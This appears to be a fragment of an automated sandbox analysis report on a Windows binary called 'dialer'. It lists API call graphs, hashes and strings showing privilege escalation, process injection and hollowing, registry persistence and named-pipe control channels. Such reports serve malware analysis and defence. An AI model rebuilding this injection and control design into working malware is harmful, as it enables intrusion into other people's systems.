                                                                • Instruction Fuzzy Hash: 6431AE72715A8496EB20DF25E84439AB7A1F38CBC4F818125EE8D87B58EF3CC541CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Stringtry_get_function
                                                                • String ID: LCMapStringEx
                                                                • API String ID: 2588686239-3893581201
                                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                • Instruction ID: e62d533d23dffb4c4ed94c8d3f21b387f94782e51f5a93c23b438f72b0edb996
                                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                                • Instruction Fuzzy Hash: 59113636608B8086D761DB16B48039AB7A0F7CCBD4F544126EE9D87B28DF38C4448B00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFileHeaderRaise
                                                                • String ID: csm
                                                                • API String ID: 2573137834-1018135373
                                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                • Instruction ID: 5942f71cd9506f541eeb2539058a6da8842e636f8ea8661725a27d10931943ba
                                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                • Instruction Fuzzy Hash: B5113C32218B8582DB218F15F48035AB7A5F788B98F198621EF8D4BB28DF3CC555CB00
                                                                APIs
                                                                • try_get_function.LIBVCRUNTIME ref: 1AFFD68D
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 1AFFD6A7
                                                                Strings
                                                                • InitializeCriticalSectionEx, xrefs: 1AFFD681
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                • String ID: InitializeCriticalSectionEx
                                                                • API String ID: 539475747-3084827643
                                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                • Instruction ID: 325ac7a2e9ce5121f91fe2c1344b32e6069e036a68dc694b63c8f7b7871c0555
                                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                                • Instruction Fuzzy Hash: 1FF08236710B8091EB06AB45F44079A7331EB8CBD4F455426F95903B64CF38C999C744
                                                                APIs
                                                                • try_get_function.LIBVCRUNTIME ref: 1AFCCBC5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2257956900.000000001AFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 1AFC0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1afc0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: try_get_function
                                                                • String ID: November$October
                                                                • API String ID: 2742660187-1636048786
                                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                • Instruction ID: 8ba1f4499ac1cabc4b6466572c8bed8a24b7e2ff3a82ace552f2c2aad798446c
                                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                                • Instruction Fuzzy Hash: 85E09A7674168692EB0B8BD6F4407E47221AB88784F9A513ADA180625AEF38C8878342
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Valuetry_get_function
                                                                • String ID: FlsSetValue
                                                                • API String ID: 738293619-3750699315
                                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                • Instruction ID: 8c6166d4ce95a1bcf568f3017bc7e07398c4de2c9f263e8fa4f69093ed5a3e48
                                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                                • Instruction Fuzzy Hash: F2E0127221474191EF066B55F8847DA7332BB8C7C4F4A5526F91907365CF38C859C714

                                                                Execution Graph

                                                                Execution Coverage:48.1%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:37.4%
                                                                Total number of Nodes:230
                                                                Total number of Limit Nodes:22
                                                                execution_graph 406 7ff603b02314 409 7ff603b02328 406->409 434 7ff603b02078 409->434 413 7ff603b02078 14 API calls 414 7ff603b023de GetCurrentProcessId OpenProcess 413->414 415 7ff603b02400 OpenProcessToken 414->415 416 7ff603b02486 FindResourceExA 414->416 419 7ff603b0247d CloseHandle 415->419 420 7ff603b02419 LookupPrivilegeValueW 415->420 417 7ff603b0231d ExitProcess 416->417 418 7ff603b024a6 SizeofResource 416->418 418->417 421 7ff603b024bf LoadResource 418->421 419->416 420->419 422 7ff603b02433 AdjustTokenPrivileges 420->422 421->417 423 7ff603b024d3 LockResource GetCurrentProcessId 421->423 422->419 424 7ff603b02477 GetLastError 422->424 451 7ff603b017f8 GetProcessHeap HeapAlloc 423->451 424->419 426 7ff603b024f0 RegCreateKeyExW 427 7ff603b02532 ConvertStringSecurityDescriptorToSecurityDescriptorW 426->427 428 7ff603b0260d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 426->428 429 7ff603b02587 RegCreateKeyExW 427->429 430 7ff603b02566 RegSetKeySecurity LocalFree 427->430 431 7ff603b02693 SleepEx 428->431 432 7ff603b025c3 GetCurrentProcessId RegSetValueExW RegCloseKey 429->432 433 7ff603b02602 RegCloseKey 429->433 430->429 431->431 432->433 433->428 435 7ff603b02081 StrCpyW StrCatW GetModuleHandleW 434->435 436 7ff603b02270 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 434->436 435->436 437 7ff603b020d3 435->437 436->413 437->437 438 7ff603b0210c GetCurrentProcess K32GetModuleInformation 437->438 439 7ff603b0212e CreateFileW 438->439 440 7ff603b02267 FreeLibrary 438->440 439->440 441 7ff603b02163 CreateFileMappingW 439->441 440->436 442 7ff603b0225e CloseHandle 441->442 443 7ff603b0218d MapViewOfFile 441->443 442->440 444 7ff603b02255 CloseHandle 443->444 445 7ff603b021b1 443->445 444->442 445->444 446 7ff603b021cc lstrcmpiA 445->446 449 7ff603b021fd 445->449 446->445 447 7ff603b021ff VirtualProtect 446->447 457 7ff603b018b8 447->457 449->444 459 7ff603b014e4 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 451->459 453 7ff603b01891 GetProcessHeap HeapFree 454 7ff603b0183c 454->453 455 7ff603b0185d OpenProcess 454->455 455->454 456 7ff603b01873 TerminateProcess CloseHandle 455->456 456->454 458 7ff603b018c7 VirtualProtect 457->458 458->444 460 7ff603b01571 459->460 461 7ff603b0163b GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 459->461 460->461 462 7ff603b01586 OpenProcess 460->462 464 7ff603b01626 CloseHandle 460->464 465 7ff603b015d5 ReadProcessMemory 460->465 461->454 462->460 463 7ff603b015a3 K32EnumProcessModules 462->463 463->460 463->464 464->460 465->460 466 7ff603b02d84 467 7ff603b02d91 466->467 469 7ff603b02db1 ConnectNamedPipe 467->469 470 7ff603b02da6 Sleep 467->470 477 7ff603b01c64 AllocateAndInitializeSid 467->477 471 7ff603b02dc0 ReadFile 469->471 472 7ff603b02e0f Sleep 469->472 470->467 473 7ff603b02de3 471->473 474 7ff603b02e1a DisconnectNamedPipe 471->474 472->474 485 7ff603b026ac 473->485 474->469 478 7ff603b01cc1 SetEntriesInAclW 477->478 479 7ff603b01d9c 477->479 478->479 481 7ff603b01d1e LocalAlloc 478->481 479->467 481->479 482 7ff603b01d32 InitializeSecurityDescriptor 481->482 482->479 483 7ff603b01d44 SetSecurityDescriptorDacl 482->483 483->479 484 7ff603b01d5c CreateNamedPipeW 483->484 484->479 486 7ff603b026c1 WriteFile 485->486 487 7ff603b026b9 485->487 486->474 489 7ff603b010c0 487->489 527 7ff603b019ac OpenProcess 489->527 492 7ff603b014c5 492->486 493 7ff603b01122 OpenProcess 493->492 494 7ff603b0113e OpenProcess 493->494 495 7ff603b01161 K32GetModuleFileNameExW 494->495 496 7ff603b01208 NtQueryInformationProcess 494->496 499 7ff603b011aa CloseHandle 495->499 500 7ff603b0117a PathFindFileNameW lstrlenW 495->500 497 7ff603b0122f 496->497 498 7ff603b014bc CloseHandle 496->498 497->498 502 7ff603b0123b OpenProcessToken 497->502 498->492 499->496 501 7ff603b011b8 499->501 500->499 503 7ff603b01197 StrCpyW 500->503 501->496 504 7ff603b011e3 StrCmpIW 501->504 502->498 505 7ff603b01259 GetTokenInformation 502->505 503->499 504->498 504->501 506 7ff603b01281 GetLastError 505->506 507 7ff603b012fc 505->507 506->507 508 7ff603b0128c LocalAlloc 506->508 509 7ff603b01303 CloseHandle 507->509 508->507 510 7ff603b012a2 GetTokenInformation 508->510 509->498 511 7ff603b01317 509->511 512 7ff603b012ea 510->512 513 7ff603b012ca GetSidSubAuthorityCount GetSidSubAuthority 510->513 511->498 515 7ff603b013a6 StrStrA 511->515 516 7ff603b013ce 511->516 514 7ff603b012f1 LocalFree 512->514 513->514 514->509 515->511 517 7ff603b013d3 515->517 516->498 517->498 518 7ff603b013fe VirtualAllocEx 517->518 518->498 519 7ff603b0142b WriteProcessMemory 518->519 519->498 520 7ff603b01446 519->520 532 7ff603b018f8 520->532 522 7ff603b01466 522->498 523 7ff603b01483 WaitForSingleObject 522->523 526 7ff603b0147c CloseHandle 522->526 525 7ff603b01492 GetExitCodeThread 523->525 523->526 525->526 526->498 528 7ff603b0110e 527->528 529 7ff603b019d8 IsWow64Process 527->529 528->492 528->493 530 7ff603b019ea 529->530 531 7ff603b019f8 CloseHandle 529->531 530->531 531->528 535 7ff603b01a14 GetModuleHandleA 532->535 536 7ff603b01a34 GetProcAddress 535->536 537 7ff603b01914 535->537 536->537 538 7ff603b02cc0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 539 7ff603b02d16 K32EnumProcesses 538->539 540 7ff603b02d76 SleepEx 539->540 541 7ff603b02d2b 539->541 540->539 541->540 543 7ff603b026c8 541->543 544 7ff603b026d5 543->544 545 7ff603b026e0 543->545 546 7ff603b010c0 30 API calls 544->546 545->541 546->545 547 7ff603b0228c 548 7ff603b02299 547->548 549 7ff603b01c64 6 API calls 548->549 550 7ff603b022ae Sleep 548->550 551 7ff603b022b9 ConnectNamedPipe 548->551 549->548 550->548 552 7ff603b022fd Sleep 551->552 553 7ff603b022c8 ReadFile 551->553 555 7ff603b02308 DisconnectNamedPipe 552->555 554 7ff603b022eb 553->554 553->555 554->555 555->551 556 7ff603b026e8 557 7ff603b028be 556->557 558 7ff603b02716 556->558 561 7ff603b028cc 557->561 562 7ff603b02b0a ReadFile 557->562 559 7ff603b0271c 558->559 560 7ff603b0284a GetProcessHeap HeapAlloc K32EnumProcesses 558->560 565 7ff603b02841 ExitProcess 559->565 566 7ff603b02729 559->566 563 7ff603b02888 560->563 615 7ff603b027b7 560->615 567 7ff603b028d5 561->567 568 7ff603b02b00 561->568 564 7ff603b02b34 562->564 562->615 576 7ff603b010c0 30 API calls 563->576 563->615 577 7ff603b019ac 3 API calls 564->577 564->615 572 7ff603b027e4 RegOpenKeyExW 566->572 573 7ff603b02732 566->573 569 7ff603b02aa5 567->569 570 7ff603b028e0 567->570 571 7ff603b01768 22 API calls 568->571 580 7ff603b01a44 ReadFile 569->580 574 7ff603b028e5 570->574 575 7ff603b02921 570->575 571->615 578 7ff603b02825 572->578 579 7ff603b02811 RegDeleteValueW 572->579 588 7ff603b0274f ReadFile 573->588 573->615 574->615 639 7ff603b01958 574->639 642 7ff603b01a44 575->642 576->563 583 7ff603b02b53 577->583 626 7ff603b01ac4 SysAllocString SysAllocString CoInitializeEx 578->626 579->578 581 7ff603b02ab4 580->581 591 7ff603b01a44 ReadFile 581->591 581->615 594 7ff603b02b67 GetProcessHeap HeapAlloc 583->594 599 7ff603b027bc 583->599 583->615 587 7ff603b0282a 634 7ff603b01768 GetProcessHeap HeapAlloc 587->634 590 7ff603b02779 588->590 588->615 602 7ff603b019ac 3 API calls 590->602 590->615 596 7ff603b02acb 591->596 593 7ff603b02938 ReadFile 598 7ff603b02960 593->598 593->615 600 7ff603b014e4 13 API calls 594->600 603 7ff603b02ad3 ShellExecuteW 596->603 596->615 605 7ff603b0296d GetProcessHeap HeapAlloc ReadFile 598->605 598->615 606 7ff603b02c18 4 API calls 599->606 614 7ff603b02ba0 600->614 609 7ff603b02798 602->609 603->615 610 7ff603b029b1 605->610 611 7ff603b02a97 GetProcessHeap 605->611 606->615 607 7ff603b02bd5 GetProcessHeap 613 7ff603b02bde HeapFree 607->613 609->599 609->615 616 7ff603b027a8 609->616 610->611 617 7ff603b02a05 lstrlenW GetProcessHeap HeapAlloc 610->617 618 7ff603b029e2 610->618 611->613 613->615 614->607 666 7ff603b016d8 614->666 619 7ff603b010c0 30 API calls 616->619 623 7ff603b02a49 617->623 618->611 646 7ff603b01db4 618->646 619->615 660 7ff603b02c18 CreateFileW 623->660 627 7ff603b01c35 SysFreeString SysFreeString 626->627 628 7ff603b01b16 CoInitializeSecurity 626->628 627->587 629 7ff603b01b52 628->629 630 7ff603b01b5e CoCreateInstance 628->630 629->630 631 7ff603b01c2f CoUninitialize 629->631 630->631 632 7ff603b01b92 VariantInit 630->632 631->627 633 7ff603b01be8 632->633 633->631 635 7ff603b014e4 13 API calls 634->635 637 7ff603b017a6 635->637 636 7ff603b017d4 GetProcessHeap HeapFree 637->636 638 7ff603b016d8 5 API calls 637->638 638->637 640 7ff603b01a14 2 API calls 639->640 641 7ff603b0196d 640->641 643 7ff603b01a68 ReadFile 642->643 644 7ff603b01aa5 643->644 645 7ff603b01a8b 643->645 644->593 644->615 645->643 645->644 656 7ff603b01de0 646->656 647 7ff603b01fb8 647->611 648 7ff603b01e3e CreateProcessW 649 7ff603b01e86 VirtualAllocEx 648->649 648->656 650 7ff603b01eb9 WriteProcessMemory 649->650 649->656 650->656 651 7ff603b01fc4 OpenProcess 652 7ff603b01fd7 TerminateProcess 651->652 651->656 652->656 653 7ff603b01f2a VirtualAlloc 655 7ff603b01f49 GetThreadContext 653->655 653->656 654 7ff603b01ee4 WriteProcessMemory 654->656 655->656 657 7ff603b01f61 WriteProcessMemory 655->657 656->647 656->648 656->651 656->653 656->654 657->656 658 7ff603b01f89 SetThreadContext 657->658 658->656 659 7ff603b01fa9 ResumeThread 658->659 659->647 659->656 661 7ff603b02c62 WriteFile 660->661 662 7ff603b02a83 GetProcessHeap HeapFree 660->662 663 7ff603b02ca4 CloseHandle 661->663 664 7ff603b02c86 661->664 662->611 663->662 664->663 665 7ff603b02c8a WriteFile 664->665 665->663 667 7ff603b01751 666->667 668 7ff603b016f7 OpenProcess 666->668 667->607 668->667 669 7ff603b0170f 668->669 670 7ff603b018f8 2 API calls 669->670 671 7ff603b0172f 670->671 672 7ff603b01748 CloseHandle 671->672 673 7ff603b0173d CloseHandle 671->673 672->667 673->672

                                                                Callgraph

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3019134301.00007FF603B01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF603B00000, based on PE: true
                                                                • Associated: 00000014.00000002.3018963890.00007FF603B00000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019271113.00007FF603B03000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019486516.00007FF603B06000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_7ff603b00000_dialer.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess$Close$CurrentHandleResource$ConditionFileMaskSecurityThread$DescriptorFreeHeapModuleOpenTokenValue$AdjustAllocConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringVerifyVersionViewlstrcmpi
                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                • API String ID: 2439791646-1130149537
                                                                • Opcode ID: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
                                                                • Instruction ID: b7714f51c7c9d88b7636afb76891d566ff733befa8d60dad5e35ae7282e82abc
                                                                • Opcode Fuzzy Hash: e217ab2428879e7bf15cc9a9388402d8400cf51ef4bf127441e202d36daec020
                                                                • Instruction Fuzzy Hash: A3A14135A09B8286E7208F61FA5A3A973E1FB9A74AF604135D9CD97B64DF3CD148C700

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3019134301.00007FF603B01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF603B00000, based on PE: true
                                                                • Associated: 00000014.00000002.3018963890.00007FF603B00000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019271113.00007FF603B03000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019486516.00007FF603B06000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_7ff603b00000_dialer.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                • String ID:
                                                                • API String ID: 4084875642-0
                                                                • Opcode ID: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                • Instruction ID: 58fd6e88681655eed46428db0a0be4e9d2bb7c14c522e3b37786ca08ec6a33bf
                                                                • Opcode Fuzzy Hash: 0c5f04347bf6d44913e8b334837d31c7522880c0df581b7b1d3a354cacd3bc02
                                                                • Instruction Fuzzy Hash: 8751E136B14A828AEB24CF66E9496BD23A0FB5AB8AF544034DE8DA7754DF3CD445C700

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3019134301.00007FF603B01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF603B00000, based on PE: true
                                                                • Associated: 00000014.00000002.3018963890.00007FF603B00000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019271113.00007FF603B03000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019486516.00007FF603B06000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_7ff603b00000_dialer.jbxd
                                                                Similarity
                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                • String ID:
                                                                • API String ID: 3197395349-0
                                                                • Opcode ID: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                • Instruction ID: e85a228786a56630ceadfc3c674da01c2f858033899b397116163459ce0aa0c8
                                                                • Opcode Fuzzy Hash: 81527eae8623b787a181e0c46c37d2868846c75f5fa2d30b1d243af947967be4
                                                                • Instruction Fuzzy Hash: 3B41AF36615B41CAE760CF28E5857AD37B4FB55788F50023AEA8D83B98EF78D108CB40

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3019134301.00007FF603B01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF603B00000, based on PE: true
                                                                • Associated: 00000014.00000002.3018963890.00007FF603B00000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019271113.00007FF603B03000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019486516.00007FF603B06000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_7ff603b00000_dialer.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                • API String ID: 2203880229-3489460547
                                                                • Opcode ID: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
                                                                • Instruction ID: ddeefcad6021c46cee538cfe129916caa4d57952f0539d64733d4a8362673232
                                                                • Opcode Fuzzy Hash: 7d22ea23ef86ef8925f3c0e3dc4e470fe94490edd279db0f7d690e2db9d12c90
                                                                • Instruction Fuzzy Hash: 3011CA35718646C1E714DF11E51A3B96360EF567AAF244234D5DE966E4CF3CD408C700

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3019134301.00007FF603B01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF603B00000, based on PE: true
                                                                • Associated: 00000014.00000002.3018963890.00007FF603B00000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019271113.00007FF603B03000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019486516.00007FF603B06000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_7ff603b00000_dialer.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                • API String ID: 2071455217-3440882674
                                                                • Opcode ID: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
                                                                • Instruction ID: 592a5162aec9fe265f9f1356edabd8a1a2ddb20d072c912318f896f9c7f3db80
                                                                • Opcode Fuzzy Hash: 5695317b32aa55875ab713aa7e4462bbb3149900d195a386a470b0f830d0d176
                                                                • Instruction Fuzzy Hash: 5F01B924F0864681E6149B21E65E37973A0AF67BAAF344634C6DE965D0CF3CD44CC700

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3019134301.00007FF603B01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF603B00000, based on PE: true
                                                                • Associated: 00000014.00000002.3018963890.00007FF603B00000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019271113.00007FF603B03000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019486516.00007FF603B06000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_7ff603b00000_dialer.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpenWow64
                                                                • String ID:
                                                                • API String ID: 10462204-0
                                                                • Opcode ID: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                • Instruction ID: c26af73d1fa97dbccfbbc27193089c3901e1bee720c9ce1003edf213c06c382b
                                                                • Opcode Fuzzy Hash: ea685a94494dd3c72d9a5f52f0d7d3242b8d37645b818c6e37f69502b31e9c88
                                                                • Instruction Fuzzy Hash: E2F06D25B0878282EB188F16F68522962A0FB8DBC1F588039EA8D93748DF3CD445C700

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00007FF603B02328: VerSetConditionMask.NTDLL ref: 00007FF603B02397
                                                                  • Part of subcall function 00007FF603B02328: VerSetConditionMask.NTDLL ref: 00007FF603B023A8
                                                                  • Part of subcall function 00007FF603B02328: VerSetConditionMask.NTDLL ref: 00007FF603B023B9
                                                                  • Part of subcall function 00007FF603B02328: VerifyVersionInfoW.KERNEL32 ref: 00007FF603B023CC
                                                                  • Part of subcall function 00007FF603B02328: GetCurrentProcessId.KERNEL32 ref: 00007FF603B023DE
                                                                  • Part of subcall function 00007FF603B02328: OpenProcess.KERNEL32 ref: 00007FF603B023EE
                                                                  • Part of subcall function 00007FF603B02328: OpenProcessToken.ADVAPI32 ref: 00007FF603B0240F
                                                                  • Part of subcall function 00007FF603B02328: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF603B02429
                                                                  • Part of subcall function 00007FF603B02328: AdjustTokenPrivileges.KERNELBASE ref: 00007FF603B0246D
                                                                  • Part of subcall function 00007FF603B02328: GetLastError.KERNEL32 ref: 00007FF603B02477
                                                                  • Part of subcall function 00007FF603B02328: CloseHandle.KERNELBASE ref: 00007FF603B02480
                                                                  • Part of subcall function 00007FF603B02328: FindResourceExA.KERNEL32 ref: 00007FF603B02494
                                                                  • Part of subcall function 00007FF603B02328: SizeofResource.KERNEL32 ref: 00007FF603B024AB
                                                                  • Part of subcall function 00007FF603B02328: LoadResource.KERNEL32 ref: 00007FF603B024C4
                                                                  • Part of subcall function 00007FF603B02328: LockResource.KERNEL32 ref: 00007FF603B024D6
                                                                  • Part of subcall function 00007FF603B02328: GetCurrentProcessId.KERNEL32 ref: 00007FF603B024E3
                                                                • ExitProcess.KERNEL32 ref: 00007FF603B0231F
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3019134301.00007FF603B01000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF603B00000, based on PE: true
                                                                • Associated: 00000014.00000002.3018963890.00007FF603B00000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019271113.00007FF603B03000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                • Associated: 00000014.00000002.3019486516.00007FF603B06000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_7ff603b00000_dialer.jbxd
                                                                Similarity
                                                                • API ID: Process$Resource$ConditionMask$CurrentOpenToken$AdjustCloseErrorExitFindHandleInfoLastLoadLockLookupPrivilegePrivilegesSizeofValueVerifyVersion
                                                                • String ID:
                                                                • API String ID: 2329183550-0
                                                                • Opcode ID: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                                • Instruction ID: 08ccbab5609030791779f5809b54bf063b4814d50cd2177f033f4284f5c8cf5a
                                                                • Opcode Fuzzy Hash: c424f5b466816f57c667fdb355f9c01d35ce1647c2c5f950e20106d890b0f394
                                                                • Instruction Fuzzy Hash: A7A00414F1554145D5053775555F07D11515F7F707F701C34D04DF5151DF1C555D4711